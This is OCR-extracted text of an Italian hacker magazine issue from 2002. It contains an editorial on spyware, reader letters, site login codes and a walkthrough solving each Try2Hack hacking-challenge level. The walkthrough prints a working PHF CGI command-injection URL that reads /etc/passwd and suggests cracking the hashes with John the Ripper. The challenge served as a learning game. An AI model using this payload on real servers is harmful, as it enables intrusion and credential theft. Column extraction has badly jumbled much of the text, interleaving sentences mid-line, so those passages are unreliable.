Sei sulla pagina 1di 31

02 editoriale 4-09-2002 10:44 Pagina 2

hack.er (hãk’∂r)
“Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione
e come espandere le loro capacità, a differenza di molti utenti, che preferiscono
imparare solamente il minimo necessario.”

Anno 1  N. 8
12 settembre/26 settembre 2002 Non è tutto gratis
Boss: theguilty@hackerjournal.it

Publisher: ilcoccia@hackerjournal.it quello che luccica...


Editor: grAnd@hackerjournal.it,
Chi di voi accetterebbe in regalo un televisore che comunica al produttore
Graphic designer: Michele Lovison,
Davide Colombo quali canali e che tipo di videocassette vi piace guardare? E che magari aves-
se anche un microfono in grado di registrare tutto quello che dite in casa vo-
Contributors: Bismark.it, Tuono Blu,
Onda Quadra, stra? Ben pochi, credo.
Eppure qualcosa di simile accade con il software. A metà strada tra i pro-
Publishing company
4ever S.r.l. grammi gratuiti e quelli a pagamento, si è insinuata negli ultimi anni una nuo-
Via Torino, 51 va categoria, quella dei programmi Adware, o Spyware. In cambio della licen-
20063 Cernusco sul Naviglio
Fax +39/02.92.43.22.35 za d'uso del programma, l'utente accetta di installare un'altro software, che ser-
ve a tracciare le sue abitudini di navigazione per comunicarle a un network
Printing
Stige (Torino) pubblicitario che ne farà tesoro, rivendendole ai suoi inserzionisti. Ad aggra-
vare il panorama già di per sé inquietante, c'è il fatto che le comunicazioni tra
Distributore
Parrini & C. S.PA. il software spione e la casa madre avvengono in modo cifrato, e non è possi-
00187 Roma - Piazza Colonna, 361- bile sapere esattamente "che tipo" di dati vengono inviati. Bisogna fidarsi del-
Tel. 06.69514.1 r.a.
20134 Milano, via Cavriana, 14 le dichiarazioni del produttore (ne parliamo più in dettaglio nell'articolo di pa-
Tel. 02.75417.1 r.a. gina 18).
Pubblicazione quattordicinale
registrata al Tribunale di Milano Di chi è la colpa? Dei network pubblicitari senza scrupoli? Dei produttori di
il 25/03/02 con il numero 190. shareware ingordi? Del fatto che su Internet non si possono far valere le leggi
Direttore responsabile: dei singoli stati (che in molti casi impedirebbero simili violazioni alla privacy?).
Luca Sprea Accanto a queste banali risposte, ne aggiungiamo una un po' fastidiosa: la col-
Gli articoli contenuti in Hacker pa è anche nostra.
Journal hanno uno scopo prettamente Ci siamo abituati così tanto al "tutto gratis", che l'idea di pagare per ottene-
didattico e divulgativo. L’editore
declina ogni responsabilita’ circa re un prodotto o un servizio ormai ci suona strana, anormale, e qualsiasi stra-
l’uso improprio delle tecniche e tagemma per evitare di sborsare quattrini è buono. Anche la svendita della no-
dei tutorial che vengono descritti
al suo interno. stra privacy. Accanto a produttori di software che hanno visto negli spyware
L’invio di immagini ne autorizza un'allettante opportunità di guadagno in più, qualcuno ha dovuto ricorrere ad
implicitamente la pubblicazione
gratuita su qualsiasi pubblicazione essi per riuscire ad andare avanti, visto che -tra chi sceglieva freeware di gran-
anche non della 4ever S.r.l. di marche e chi semplicemente copia tutto il piratabile- non riuscivano più a
Copyright 4ever S.r.l. vendere nemmeno uno shareware da pochi dollari. Ma vale davvero così poco
Testi, fotografie e disegni, il diritto alla privacy?
pubblicazione anche parziale vietata.
Realizzato con la collaborazione di
Hacker News Magazine - Groupe Hagal grand@hackerjournal.it
Arian

PS: a proposito di stratagemmi controproducenti, il sondaggio di pagina 7


dimostra come, nel tentare di "fregare" una multinazionale troppo esosa, la pi-
HJ: intasate le nostre caselle rateria abbia finito col regalarle un monopolio quasi assoluto.
Ormai sapete dove e come trovarci, appena
possiamo rispondiamo a tutti, anche a quelli
incazzati. Parola di hacker. SCRIVETE!!!

redazione@hackerjournal.it

2 | www.hackerjournal.it
03 open 4-09-2002 10:41 Pagina 3

Questo spazio è vostro!


Approfittatene, e fate lavorare quella tastiera!

o
r em vo
Sa uo la
n
di dico ì
OPEN SOURCE e
in iove bre
d !
G tem
t
6 se
2

OPEN SOUR
CE
Hackers,
mezzo secolo di vittorie.
Il movimento “Lascia che il tuo cervello ti porti do- mac, redivivo simbolo di intelligenza
hacker nac- ve nessuno ha mai osato”, questo votata all’indipendenza. O di Linus
que circa cin- potrebbe essere il motto degli hac- Torvalds, che, in epoca più recente
quanta anni fa kers. ha regalato al mondo un sistema
quando, del tut- Nonostante i mass-media dipingano operativo capace di crescere solo
to spontanea- quotidianamente l’underground in- grazie al supporto degli appassiona-
mente, un gruppo formatico come luogo di perdizione, ti, e di demolire realtà commerciali
di primi della classe, popolato di pervertiti, criminali, ter- di livello mondiale.
che avevano perso la testa per l’in- roristi e feccia della peggior specie - Ai nostri giorni c’è un’altra battaglia
formatica, iniziò a curiosare per co- dedicando (solitamente a sproposi- in corso, che vede Goldstein, storico
noscere, a studiare per sviluppare, a to) all’Internet e all’hacking intere Editor in Chief della rivista 2600, op-
mettersi in discussione per progredi- pagine di quotidiani, settimanali e posto alle lobby statunitensi del ci-
re… senza chiedere nulla come corri- periodici, ed intere puntate di note nema per la nota vicenda DECSS.
spettivo, senza inseguire la notorietà trasmissioni radiofoniche e televisi- Che vinca o perda, poco importa; il
o il successo, ma per il solo gusto di ve, per soli fini di tiratura e di au- principio di indipendenza dalle ra-
farlo. dience - la realtà è, per fortuna, ben gioni commerciali, a beneficio della
Un approccio allo studio che cambiò diversa. diffusione delle informazioni è ormai
il mondo, regalandoci, attraverso L’attività dei gruppi di sedicenti hac- passato, ed inizia ad essere compre-
migliaia di scoperte ed invenzioni, kers che, negli ultimi anni, ha prefe- so ed apprezzato anche dalla gente
grandi e piccole, l’informatica com’è rito scarabocchiare siti istituzionali e normale. E nulla potrà riportare in-
oggi. Ma, soprattutto, insegnando, a prelevare cartelle cliniche presiden- dietro il tempo. Il Copyright, nell’era
chi ha orecchie per sentire e occhi ziali, anziché sviluppare nuovi mo- digitale, dovrà cambiare ed ade-
per vedere, a chi non si lascia fuor- delli di sicurezza informatica, diffon- guarsi.
viare da false barriere sociali, eco- dere notizie fuori dai canali conven- Ed anche questa sarà una vittoria
nomiche o culturali, un diverso modo zionali o partecipare alle iniziative degli hacker, che a modo loro, senza
di valutare la ricerca, la sperimenta- finalizzate a rendere la tecnologia e spari, senza bombe, senza violenza,
zione, il progresso e, in definitiva, le le informazioni realmente alla por- hanno trasformato il mondo in soli
persone e la vita di tutti i giorni. tata di tutti, ha indubbiamente reso cinquant’anni. Dimostrando che le
Per un hacker non è importante es- più difficoltoso il percorso di una cul- rivoluzioni possono essere incruente,
sere nero o bianco, cattolico o musul- tura che, ciò nonostante, inizia a dif- ma avere effetti ancora più impor-
mano, ricco o povero; ciò che è im- fondersi anche tra la gente normale. tanti.
portante è quello che ciascuno sa fa- Per fortuna i lamers passano e gli Com’era il titolo? Mezzo secolo di vit-
re, trovare, inventare, trasmettere hacker restano. Nel cuore della gen- torie. Chissà che tra cinquant’anni,
agli altri. E anche un fallimento può te, degli appassionati come dei co- qualcuno, rileggendo questa copia di
diventare, in quest’ottica, un mo- muni mortali, resta il ricordo di Steve HackerJournal, non sorrida pensan-
mento di crescita, un passo impor- Jobs e Steve Wozniak, che in un ga- do a quante altre ce ne sono state,
tante ed apprezzabile, se denota vir- rage diedero vita al primo personal levando il calice e celebrando cen-
tuosismo, capacità, intelligenza, bra- computer; un ricordo che oggi rivive t’anni di vittorie degli hackers.
vura. nel cuore di ogni possessore di un i- Tuono Blu

UN GIORNALE PER TUTTI: SIETE NEWBIE O VERI HACKERS?


Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac-
king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si fa
per dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo di
Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co-
mincia), MIDHACKING (per chi c’è già dentro) e HARDHACKING (per chi man-
gia pane e worm).

www.hackerjournal.it |3
04_07_HJ08_posta 4-09-2002 10:51 Pagina 4

www.hackerjournal.it

ci vuole una chattata! Davvero, sono andare avanti con quello altrimenti il
mailto: esterrefatto! Poi (già detto da altre
persone) ci lamentiamo del luogo co-
gioco non continuava ma rimanevo
allo stesso punto.
redazione@hackerjournal.it
mune Esistono dei programmi che indivi-
Hacker=Geek (Disadattato). duano ed eliminano i bug?
RECUPERO PASSWORD DI OFFICE In conclusione, significa che per es- Dragon Hacker
iao, vi scrivo per chiedervi se è sere hacker me lo de-
C possibile recuperare delle pas-
sword dei documenti word/excel e se
vono dire i dottori,
devo essere associa-
è possibile quali programmi si pos- le e diventare un
sono utilizzare? computer dipenden-
Marko te??? Vorrei dei
chiarimenti, e vorrei
Sì. Esistono. Prova a fare una ricerca aggiungere, che non
su Google usando la stringa "office me la prendo con
password recover" e troverai svariati voi, ma con altri
programmi. Ovviamente il loro utiliz- hacker che si dicono
zo è lecito solo per accedere a un tuo chissà cosa. Mi asso-
documento di cui hai smarrito la pas- cio completamente
sword. alla lettera di Gan-
dalf86 dello scorso
HACKER RAZZISTI? numero.
Vi scrivo in merito a un dubbio sorto- Speranzoso di una
mi durante la mia piccola carriera risposta...
hacker... le possibilità di soluzione Run3z
dell'argomento sono due: o sono
scemo io, o le cose non sono chia- Che ti devo dire... la
re... nostra posizione la
Io sono un newbie (me la cavo, mi ri- conosci: nessuno na-
tengo abbastanza bravo), e sono ab- sce "imparato", e la linfa vitale della
bastanza nuovo nel mondo hacking. comunità hacker è sempre stata la li- Stai pur certo che se esistesse un pro-
Volevo che mi spiegaste un paio di bera circolazione delle informazioni. gramma simile, le software house lo
cose... Ci sono molti hacker che di- È anche vero però che qualcuno, una pagherebbero a peso d'oro (ma
cono di odiare il razzismo. Ok, sono volta che individua un vero esperto, quanto "pesa" un software?). Purtrop-
d'accordo, anche io sono contro... comincia a tampinarlo per avere ri- po, a parte gli strumenti di debug-
ma poi, quando vado a chiedergli sposte immediate, che spesso si pos- ging degli ambienti di sviluppo (che
aiuto, di darmi un consiglio, o gli sono ottenere con qualche ricerca e sicuramente le software house utiliz-
faccio vedere qualche mia creazione una mezz'ora di studio. A volte danno zano, ma evidentemente no abba-
(magari sbagliata) mi dicono: "non fastidio anche le persone che cerca- stanza), non esistono simili "soluzioni
sei nato hacker...". no soltanto una comoda via per rag- magiche".
Ora, questi sono contro il razzismo giungere uno scopo (spesso nemme-
poi fanno una simile distinzione? Poi, no troppo eticamente corretto), senza NUOVI HACKER, VECCHIO STILE
esiste davvero? Se così fosse, ci sa- nemmeno preoccuparsi di voler capi- o letto l'articolo "I programmato-
rebbe [H]iTLeR'45 che dominerebbe
Hackerlandia, il paese dei veri hac-
re come funzionano i sistemi (anche
sul nostro forum o nel canale #hac-
H ri della vecchia guardia" di HJ
n°7, e vorrei raccontare la mia storia.
ker, e Ciampi che governerebbe Uo- kerjournal di Azzurra.org si trovano Ricordo ancora il giorno in cui mio
mini-non-hacker-land. Non mi sem- persone simili). In questo caso, non padre mi diede il mitico Amstrad.
bra tanto una cosa intelligente... me la sento di condannare chi li Avevo 8 anni, e per mesi feci l'unica
Poi, scusate l'ignoranza... io sono un snobba o li invita ad andare a scopa- cosa che sapevo fare con quel com-
chatter, e non ho chiaro il motivo per re il mare. puter: giocarci.
cui un hacker (newbie, midhack o Arrivò però il giorno in cui mi chiesi:
hardhack, chiunque) non può chatta- BACCHETTA MAGICA? "ma come cavolo funziona questo co-
re. Io sono solo molto del mio tempo Ho un problema: sono stato vittima so"?. Quel giorno arrivò mio cugino,
al pomeriggio, e nel tempo libero, se per due volte di un bug sempre nello smontò pezzo per pezzo il vecchio
non faccio tutorial o cavolate simili... stesso videogioco e quindi ho dovuto Amstrad, mi spiegò da quali parti era
beh ecco per smorzare la solitudine, caricare un salvataggio precedente e formato e mi disse "ora rimontalo".

4 | www.hackerjournal.it
04_07_HJ08_posta 4-09-2002 10:51 Pagina 5

o A
em vo STAMP
LIBERAITÀ
r
Sa uo la
n
di dico ì
e d ! C
in iove bre
G tem
t
NO PINUFBOBRLMIAZIONI
6 se SOLO ARTICOLI
2 E

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI


Ci misi un po' di tempo per rimontar- linguaggi super sofisticati. Tanta per rimetterli in sesto è senza dubbio
lo, ma alla fine ci riuscii. gente che parla a vanvera ma, quan- una buona idea, che permette di im-
Col tempo ho cominciato ad appre- do è l'ora della verifica, si dilegua parare molte cose. (Quella degli HD
dere da solo i primi rudimenti di Ba- nel nulla. Ora ho 17 anni e spero congelati comunque è la prima volta
sic sul Commodore 64. Alle scuole che la passione che per il PC non mi che la sentiamo!). Riguardo ai perso-
medie conobbi Stefano, e il Pascal. abbadoni mai... naggi “tutte chiacchiere e scriptini
Ormai ero una cosa sola con il PC, e Simone già fatti”, che vuoi farci? Lasciali par-
finalmente mio cugino mi regalò il lare, aspetta che la sparino davvero
grande i486 DX-2, su cui installai Lo speriamo anche noi, Simone. E l'i- grossa (meglio se in pubblico), e poi
Windows 95. Io e Stefano eravamo dea di recuperare vecchi computer sputtanali senza pieta! ;-)
grandi amici, e ci legava e ci lega
molto il PC. Alle medie imparai bene
Attiva la tua casella
IS
il Pascal, e alla fine dell'ultimo anno
cominciai ad ambientarmi con Del-
phi di Borland. iltuonome@hackerjournal.it
AT

Arrivati alle superiori, io e Stefano


incontriamo Daniele, ancne lui ap- Dopo aver fatto clic sul link "Mail ramente nella mail di benvenuto che riceverai.
GR

passionato di PC, e così decidemmo gratis" nella home page di www.hacker- Attenzione: come nome utente dovrai indicare il
di mettere su un piccolo laboratorio. journal.it, e accettato le condizioni del con- tuo indirizzo email completo, compresa la parte
Avevamo tutti pezzi di PC buttati qua tratto, inserisci username e password che tro- @hackerjournal.it.
e la, memorie RAM, schede video, vi a pagina 7 della rivista. Questa password ser-
schede audio, schede madri per ve solo per l'attivazione, e non sarà necessaria
486... Il primo PC che abbiamo rico- per consultare la tua casella.
struito (un Pentium 133) ci ha occu-
pato un duro anno di lavoro, però ci
siamo divertiti.
Il nostro laboratorio, era una barac-
ca scassata vicino casa mia, e d'in-
verno faceva così freddo che quando
accendevi i PC gli hard disk non fa-
cevano il boot perchè erano congela-
ti! Li dovevi far girare per 2 minuti, e
dopo riavviare il PC. Solo allora ese- Bene, puoi cominciare a leggere i messaggi, or-
guivano il boot correttamente. ganizzare le tue cartelle (dal link Folders), inse-
Mi sono capitati professori che non Inserisci il tuo nome, un tuo attuale indirizzo di rire gli indirizzi dei tuoi amici nella rubrica (da
capivano una cippa, e io non potevo posta elettronica e il nome utente che vuoi usare Address Book), e se vuoi puoi modificare la pas-
dire niente altrimenti mi segavano le come indirizzo. Occhio: l'indirizzo attuale deve sword predefinita e impostare altre opzioni (da
gambe :). Il computer è una passione essere valido, perché la password e le istruzioni Preferences).
che ti nasce dentro, e c'è gente che per il collegamento verranno spedite lì.
crede di saperlo usare perchè ha il
PC potente o perchè parla usando

Nuova password!
Ecco i codici per accedere alla Secret Zone
del nostro sito, dove troverete informazioni
e strumenti interessanti. Con alcuni browser,
potrebbe capitare di dover inserire due vol-
te gli stessi codici. Non fermatevi al primo
tentativo. Una volta ricevuta la password nella vostra at- 5 Mbyte di spazio a disposizione -
tuale casella di posta, potrai collegarvi all'inter- Collegamento Web sicuro (SSL 128
user: 2llo faccia Web della casella direttamente dalla ho- bit) - Possibilità di creare cartelle -
me page. Tutti i dati, compresi quelli per scarica- Address Book - Signature - Modifica
pass: rad1 re la posta con un client Pop3, sono indicati chia- password - Preview del messaggio

www.hackerjournal.it |5
04_07_HJ08_posta 4-09-2002 10:51 Pagina 6

www.hackerjournal.it
Chi è davvero Tuono Blu!
Sul numero scorso vi abbiamo sfidato a individuare
il vero nome di Tuono Blu, l'avvocato che risponde ai
vostri dubbi e quesiti su
hacking e infrazioni del-
la legge.
NAVIGAZIONE ANONIMA Siete stati velocissimi: a
Carissimi amici di HJ, questa poche ore dall'uscita in DIVENTARE HACKER
è una "tirata d'orecchie virtua- edicola, in molti avete Salve sono Davide ho preso
le"... vi scrivo per informarvi indovinato che si tratta- il n°6 della vostra rivista e
che il servizio di navigazione va dell'Avv. Gianluca Po- penso di prendere anche il
anonima che rendete disponi- mante del Foro di Tera- n° 7 poichè he molto inte-
bile nella vostra secret zone mo. ressante, volevo chiedervi se
non funziona per niente (nes- Tutte e 5 le copie del suo è veramente possibile con la
suno dei 3 link). libro "Hacker e computer vostra rivista diventare veri
Sono sicuro che si tratta solo crimes" che avevamo Hacker.
di un piccolo inconveniente e messo in palio sono sta-
che presto provvederete al ri- te assegnate quindi a Sinceramente, no. La nostra
pristino. tempo record. rivista non basta. È un po'
Nel frattempo vi faccio i miei I più veloci sono stati: come credere che si può di-
complimenti per la rivista che Marco B., aNgelo (Ares), ventare santi leggendo Fa-
mi piace molto. Gianluca "ASTAL", Fulvio, miglia Cristiana, o piloti di
Saluti... Irene R. Formula Uno leggendo
Skizzo Quattroruote. Certo, se ti in-
rore, intuisco che c'è qualcosa di po- teressa l'argomento, su Hacker Jour-
A volte questi servizi hanno dei pro- co corretto ma mi piacerebbe capire nal troverai molti spunti di riflessione
blemi. Nel momento in cui ho provato il meccanismo con cui avviene questo e stimoli per approfondire le tue co-
io, Anonymizer funzionava tranquilla- (quasi sempre x pubblicità ambigua) noscenze. Ma devi avere l'atteggia-
mente, @nonimouse solo a tratti, e come contrastare o controbattere. mento giusto e tanta voglia di fatica-
mentre SafeWeb era giù. In alternati- Gian re.
va, prova ad andare a vedere
http://anonymizer.autistici.org/anon Se si tratta di posta pubblicitaria in- VELOCITÀ DEL MODEM
ymizer-FAQ.php desiderata (Spam), probabilmente il Sono da poco un lettore della vostra
mittente ha indicato un indirizzo ine- rivista, ma mi sto dando da fare con
MESSAGGI SIBILLINI... sistente per evitare sanzioni da parte gli arretrati e cerco di imparare più
bSalve a tutti ho acquistato il n.6 del- del suo provider. L'invio di simili mes- in fretta che posso... Comunque vi
by

y
laeVs rivista visto che è un campo che saggi è infatti quanto meno biasima- scrivo per un problema che ho con i
mi ha sempre incuriosito. to, se non addirittura illegale in certi driver del mio modem: l'ho installato
Volevo porvi un domanda da profa- paesi; logico quindi che il mittente con i driver più adatti che c'erano sul
no: spesso mi arrivano delle mail con voglia tutelarsi da eventuali denunce cd ma si connette solo a 45333 bps,
un certo mittente ma, quando rispon- o terminazioni del suo account. un po pochino visto che dovrebbe
do, compare un'indirizzo diverso. Anche nei casi in cui l'indirizzo esiste viaggiare a 56 kbps; comunque è un
Anche quando rispondo all'indirizzo davvero, non conviene _mai_ rispon- "mentor 56kbps USB modem exter-
giusto, il 95% delle volte mi arriva la dere a quei messaggi, neanche se in- nal" installato con questi driver "Co-
notifica dell'inesistenza dell'indirizzo vitano a scrivere a un cer- nexant HCF V90 Data Fax Voice USB
o messaggi di er- to indirizzo per essere ri- Modem", il sistema operativo è
mossi da una lista. L'uni- win98SE, mi sapreste dire dove pos-
co risultato otterresti è so trovare dei driver + adatti? Ah
quello di confermare allo premetto che tramite "gestione peri-
spammatore che il tuo in- feriche" ne ho già provate un sacco...
dirizzo di posta è valido vabbè in attesa di una vostra risposta
e funzionante, cosa che attendo e vi auguro un buon lavoro.
farà aumentare il nume- Grazie e ciaooo!!
ro di posta spazzatura Bimbosenzavolto
che riceverai.
Sul come difendersi 56 Kbps è la velocità massima rag-
dallo Spam, abbiamo giungibile dal modem, ma questa è
pubblicato un articolo condizionata dalla qualità del segna-
sul n. 4: puoi trovare le telefonico che raggiunge la tua
l'arretrato nella secret abitazione (in pratica, dalla bontà
zone del nostro sito. del collegamento tra la centrale tele-

6 | www.hackerjournal.it
04_07_HJ08_posta 4-09-2002 10:51 Pagina 7

A
STAMP
S a
mo
re vo
o
nu cola
LIBERAITÀ
C
i
d di
e dì
in iove bre
! NOOPINUFBOBRLMIAZIONI
L
SO L OLI
G te
t
m E ARTIC
6 se
2

IL CORAGGIO DI OSARE: INDIPENDENTI DA TUTTI


fonica e casa tua, e lecom, difficilmente
tra la spina principa- raggiungerai veloci-
le di casa al mo- tà superiori. Non c'è
dem). Sul primo trat- niente che non vada
to, ovviamente non nel tuo modem, quin-
puoi intervenire, di.
mentre per quanto
riguarda il collega- PROBLEMI CON
mento dentro casa, LA POSTA
dovresti cercare di Sono un Vs. aficiona-
collegare il computer do, anzi un vero e
con un unico cavo, proprio patito, ho
senza giunte, colle- provato ad
gato direttamente accedere alla secret-
alla presa telefonica zone x acchiapparmi
principale (e non a l'email di @hacker-
una sua derivazione). journal e
In realtà, nemmeno mi è arrivato un war-
in condizioni ottimali ning sulla inattendi-
si riescono a raggiunge- bilità del certificato di
re i 56k, perché Telecom (come protezione da parte del
altre compagnie telefoniche), pone browser IE. Vi allego
un limite inferiore alla velocità mas- l'immagine del box
sima. che mi è apparso. Ve lo dico alla ro-
In ogni caso, 45333 è una velocità mana: me devo fidà? Oppure c'è
più che dignitosa: anche con colle- qualke problema?
gamenti domestici fatti a regola d'ar- Mick
te, e in prossimità della centrale Te-

Arretrati
e abbonamenti Le motivazioni che uno trova per giustificare l'u-
so di software pirata sono tante: "costa troppo...
Siete in tanti a chiederci se sia possibile ab- Uso solo il 5% delle sue funzioni... Sono costretto
bonarsi o richiedere i numeri arretrati di a usarlo per leggere i file doc, poc, toc, soc... In
Hacker Journal, che ormai stanno diventan- fin dei conti al produttore la pirateria sta bene,
do oggetti da collezione. Stiamo cercando di perché deve affermare uno standard...
allestire le strutture necessarie, ma potreb- Ma se non fosse possibile fare copie pirata dei
be essere necessario un po' di tempo. Intan- Internet Explorer gestisce i certificati software costosi, come si comporterebbero le
to, potete trovare i PDF di tutti i vecchi nu- un po' a modo suo, e ogni volta che persone?
meri sul sito nella Secret Zone, e già che sie- c'è qualche problema, mostra dei La stragrande maggioranza di voi, se dovesse
te sul sito, iscrivetevi alla nostra mailing list: messaggi quanto meno allarmanti. pagare per intero il prezzo di Office, si rivolge-
sarete avvisati non appena i servizi abbo- Non c'è problema ad accettare il cer- rebbe a programmi alternativi (shareware o
namenti e arretrati saranno disponibili. tificato del nostro sito. Qualcuno con gratuiti, come Open Office). La domanda che,
IE addirittura non riesce a superare la come dicono i cattivi giornalisti, "sorge sponta-
pagina di login, e a caricare l'inter- nea" è: e allora perché non lo fate subito? Evite-
faccia Web. In questo caso, bisogne- reste di compiere azioni illegali (piratare il pro-
rebbe cancellare i vecchi certificati (li gramma) e al contempo contribuireste a rende-
si trova in genere nel pannello Prote- re il mondo del software un po' più libero.
zione delle Preferenze Internet, ma L’altra domanda, un po’ più ragionata, è la se-
varia a seconda della versione...), guente: se solo il 3,7% usasse Office (perché ne
avendo l'accortezza di conservare i ha strettamente bisogno), Microsoft riuscirebbe
certificati importanti (come quelli di davvero a convincere tutti gli altri ad acquistarlo
accesso ai servizi di home banking). solo per scrivere e fare di conto? Forse, in fondo
in fondo, la pirateria le fa davvero comodo?

www.hackerjournal.it |7
08_09-HJ08_TRY2H 4-09-2002 10:53 Pagina 8

Soluzioni

Sfida all’ultimo
XXXXXXXXXXXX

Hack
Vi siete cimentati con il gioco Try2Hack e siete
rimasti inchiodati a un livello? Non l'avete mai
provato, ma volete imparare qualcosa sui sistemi
di autenticazione, crittografia e tecniche di
hacking? Ecco le soluzioni di tutti i livelli del gioco

D a qualche mese, dalle pagine del


sito di Hacker Journal è possibile
cimentarsi con il gioco Try2Hack,
organizzato dall'olandese BuiZe
in collaborazione con MediaMonks.nl (mal-
grado qualcuno dica il contrario, il link al sito
cose nel modo più divertente che ci
sia: giocando. Se non si può fare a meno
di passare qualche nottata a studiare, si può
però trovare uno stimolo che renda il tutto
più piacevole. Nella fattispecie, lo stimolo è
costituito dal superare i vari livelli di
so di tenere una classifica dei più bra-
vi (li trovate in ultima pagina).
In tanti ci hanno richiesto la soluzione del gio-
co, tanto che abbiamo deciso di pubblicarla,
con una raccomandazione: la vera posta in
gioco di Try2Hack è la conoscenza. Passare
originale è sempre stato presente e ben visibi- Try2Hack, violando sistemi di autenti- i vari livelli senza avere imparato nulla
le sul nostro sito). cazione dal più banale al più sofisti- nel frattempo, è un po' come barare a
L'idea di base è semplice, e consiste nel cer- cato. Il tutto ha avuto un grande successo un solitario. Completamente inutile e
care di imparare le tra i nostri lettori, tanto che abbiamo deci- molto, molto triste.

1
K

2
si vede
In questo caso, analizzando la pagina
e fatta da un filmato
che l'autenticazione vien
anch e vede re il no-
realizzato in Flash. Si può
in que stion e (Fla sh-
me e l'indirizzo del filmato
film ato con un editor
Level2.swf). Aprendo il
are, in mez zo a ca-
di testo si possono individu
serna-
Il livello 1 era ratteri dall'aspetto alieno, le parole txtU
piuttosto banale rd, Nok iaIsG ood,
sualizzare il so . Bastava vi- me, Try2Hack, txtPasswo
rgente della pa LLeVeLL3.html.

5
strarla e aprirla gi na, o regi-
con Blocco note
duare facilmen , per indivi-
te il JavaScript
tende all'auten che sovrain-
ticazione. Nel
chiaramente le codice si può
ggere la passw
ord.

3 4 Da questo livello
nente un progra
me nel caso di
si scarica un file
mma in Visual
.zip, conte-
Basic 3. Co-
Java, il program
sere decompila ma deve es-
to (non è necess
sual Basic; si pu ar io avere Vi-
ò usare anche
tore online di w il de compila-
L'autenticazione di questo livello è basata su ww.decompiler.n
gramma si poss et). Nel pro-
Java. Per prima cosa, bisognerà procurarsi ono individuare
dedicate al ric le funzioni if
un decompilatore per poter analizzare il sor- onoscimento di
password, e l'is us ername e
l livello 1. In truzione che crea
più difficile de gente dell'applet Java (un decompilatore l'Url. In que-
Solo di poco tenticazione sto caso, userna
me e password
lo script di au piuttosto facile da usare si trova su
questo caso, ma in un file serite in chiaro non sono in-
nella pagina, http://njcv.htmlplanet.com). Nel codice si nel codice, ma
non è inserito può chiara- lievemente cam sono invece
o, di cui che si nota il riferimento a un file, chiamato level4. uffate attravers
o
di testo estern script, senza funzione Mid()
applicata alla
l'uso della
il nome (java Leggendo il file, si trovano username, pas- strin
mente vedere nel browser nuta nella cost
ante mc001A.
ga conte-
sualizzandolo sword e Url del livello successivo. Ap
estensione). Vi si vede la mano la funzio pl icando a
.nl/javascript), ne Mid(), si tro
vano userna-
www.try2hack me, password e
Url del livello su
iaro.
password in ch ccessivo.

8 | www.hackerjournal.it
08_09-HJ08_TRY2H 4-09-2002 10:53 Pagina 9

6 7
Per accedere
alla pagina bi
Internet Explor sogna avere
er 6.72, un sist
provenire dalla ema Linux e
6 non è de-
in Visual Basic pagina http://w
Il programma
compilabile. Pe
gna usare un
r avere inform
analizzatore di
azioni, biso-
pacchetti per
programma
soft.com/ms.ht
bili da realizza
Linux, e difficilm
m. Tre condiz
re (non esiste
ww.micro-
ioni impossi-
Explorer per
** LINK **
unicazioni tra il ente Microsoft
"sniffare" le com ri casuali nel be di linkare il accettereb-
rendo dei valo giochino...) . Se Iron Bishop e LordBlack hanno
e il server. Inse fa una con- sono realizzare no n si pos-
vede che questo , si può beniss pubblicato una guida al gioco
programma, si ada.media- ta: usando pe imo fare fin-
rver dhammap r esempio l'u Try2Hack molto più dettagliata
nessione al se si può indi- (http://curl.hax tility cURL
i dati trasmessi x.se), si posson di quella che potete trovare nel
monks.net,. Tra un sistema a piacimento
questi paramet
o impostare
ga cifrata con poco spazio che abbiamo a
viduare una strin cis Bacon. un file di testo ri, e ottenere
descritto da Fran con il link e la
password per disposizione qui. Per ogni
steganografico la stringa si
il livello 8.
esto sistema al livello, vengono introdotte le
Applicando qu

9
ci necessari.
ottengono i codi tecniche e le conoscenze

8
necessarie, vengono dati alcuni
indizi e, se ancora brancolate
nel buio, trovate le istruzioni
dettagliate per superare il
livello.
La guida si trova su

www.zonaitalia.it/test/try2hack.html
Analizzando il so
rgente della pa I due autori in realtà non
che lo script C gina, si nota
gi utilizzato è PH Inseriti nome utente e password, ci viene risparmiano qualche critica alla
per un baco ch F-CGI, noto
e consente di ot chiesto di collegarsi al canale #try2hack su nostra rivista e al nostro sito,
delle password, tenere il file
inserendo il segu irc.quakenet.org, e di inviare al bot anche su quella stessa pagina.
http://www.try2h ente Url:
ack.nl/cgi-bin/p TRY2HACK una query Ci viene restituita una Questo non ci impedisce di
lias=x%0a/bin hf.cgi?Qa-
/cat%20/etc/pas stringa cifrata col Frasario di Cesare (o riconoscere il buon lavoro fatto
Si ottiene il nom swd
e utente in chia Rot13). Decifrandola, scopriamo che dob- con la guida, e di indicarvi il
sword cifrata co ro, e la pas-
n algoritmo DES biamo collegarci al canale #try2hack.level9, link. Come sempre, lasciamo ai
programma . Usando un
come John usando una password, anch'essa cifrata. La nostri lettori il compito di
(www.openwal Th e Ripper
l.com/john/), si "cifratura" altro non è che la codifica Base64. farsi un'opinione, dopo aver
la password in pu ò estrarre
chiaro. Decodificando la chiave si ottiene la pas- sentito tutte le campane.
sword Level9-myBB3DIux5L, da usare per

10
accedere al canale. Una volta dentro a
#try2hack.level9 ci verrà inviata una lunga
stringa in codice binario, che una volta deco-
dificato ci invita a inviare al bot try2hack il
PASSWORD
messaggio privato "showbug", che ci restitui- Come nella migliore tradizione
sce il sorgente di uno script scritto in linguag- enigmistica, le soluzioni le
gio Tcl (comune nei bot Irc). Quello che biso- pubblichiamo capovolte (anche se
gna fare è risultare inseriti nella lista degli non a pagina 46...). Se proprio
utenti del bot, e collegarsi per una chat Dcc non potete resistere alla
tentazione, eccovele:
prima del mese
gi oc ato a Try2Hack
ch i ha al livello 9. Suc-
Pe r OwYouDidIt 10
, il gi oco terminava
di ag os to ecedente dava
bot del livello pr
n/a n/a 9
ce ss iv am en te , il livello:
r un ulteriore arsanik BuiZe 8
l'u rl pe _e_l _1 0. php
tp ://w w w. try 2h ack.nl/the_l_e_v un pro-
TonyHawk2 7
ht rgente di
qu es ta pa gi na si trova il so m pi la to sul lanparty lord 6
Su re co
am m a in Ja va , che deve esse en de un a
gr ma pr OutOfInspiration Try2Hack 5
op rio co m pu ter. Il program a. Bi so gn a
pr divers
ituisce un'altra,
AppletsAreEasy Try2Hack 4
stringa e ne rest certo ris ul ta to ,
ringa che da un
